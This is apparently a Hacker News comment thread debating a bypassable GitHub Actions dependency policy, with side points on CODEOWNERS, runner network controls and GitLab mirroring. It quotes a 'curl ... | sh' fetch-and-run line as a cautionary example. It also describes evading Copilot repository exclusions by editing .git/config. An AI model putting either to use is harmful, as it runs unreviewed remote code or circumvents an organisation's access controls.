That's like saying it's a security flaw in the Chrome store that you could enable dev mode, copy the malware and run it that way.

woodruffw 22 hours ago
I think the closer analogy would be a org-managed Chrome policy preventing people from installing certain extensions, which could then be bypassed by sideloading those extensions.
zingababba 1 day ago
Copilot repository exclusions is another funny control from GitHub. It gets the local repo context from the .git/config remote origin URL. Just comment that out and you can use copilot on an 'excluded' repo. Remove the comment to push your changes. Very much a paper control.
lmm 2 days ago
Meh. Arbitrary code execution allows you to execute arbitrary code. If you curl | sh something in your github action script then that will "bypass the policy" too.
1 day ago
MadVikingGod 2 days ago
[flagged]
woodruffw 2 days ago
The action in question is not in the repository; it's retrieved at runner execution time. I think that's an important distinction.
lixtra 1 day ago
It’s like putting

curl -sSL https://example.com/install.sh | sh

In your action. For sure happens.

woodruffw 1 day ago
Yes; I would also consider that a bad idea. Two wrongs don't make a right (and a different wrong doesn't justify a broken policy elsewhere).
masklinn 1 day ago
Being able to filter or disable network access (aside from what github requires on their side to interact with actions) would definitely be useful, but AFAIK that's only an option for self-hosted runners and enterprise accounts.
woodruffw 1 day ago
Yep, I agree completely. It's unfortunate that self-hosted runners are otherwise so difficult to secure, since controlled ingress/egress is otherwise an extremely strong motivation for using them.
1 day ago
nyc1983 1 day ago
[flagged]
1 day ago
woodruffw 1 day ago
Of the many things people have accused me of, being uninformed about GitHub Actions best practices is new.

(CODEOWNERS is a red herring: GitHub clearly intends for this policy mechanism to be used, and so it should be sound. Policy mechanisms should always be sound, even if there's a better or more general alternative mechanism. If GitHub intends CODEOWNERS to be that mechanism, then they should remove this one and document its replacement.)

nyc1983 1 day ago
Frankly I think your article focuses on an outdated or not relevant setting in GitHub. So the red herring is probably backwards here. There are tons of these (don’t get me started about topics and managing them for many repos), but GitHub has clearly been pushing rulesets over the past years and combined with CODEOWNERS this is the de-facto way of granularity managing who can make changes to GA workflows.
woodruffw 1 day ago
Unlike other things that have been moved to rulesets, there's no prominent marker on these policies indicating that they're outdated or no longer considered best practice. Do you have some kind of public indication that these are discouraged in any way?

(As others have pointed out, this isn't even necessarily something that makes sense with CODEOWNERS -- the point of a dependency policy is to not trust human identities at all.)

YetAnotherNick 1 day ago
CODEOWNERS is only for main branch AFAIK. You can run github action in commits.
nyc1983 1 day ago
CODEOWNERS combined with branch protection rules can require reviews for arbitrary branches matching a glob pattern.
gchamonlive 1 day ago
I'm inclined to add https://github.com/marketplace/actions/sync-to-gitlab to all my repos in github, so that I can tap into the social value of GitHub's community and the technical value of GitLab's everything else.
dijksterhuis 1 day ago
Simpler version from GitLab (no actions needed) https://docs.gitlab.com/user/project/repository/mirror/push/

I was planning to do this myself. GitLab for dev work proper. GitHub push mirror on `main` for gen-pop access (releases/user issue reporting).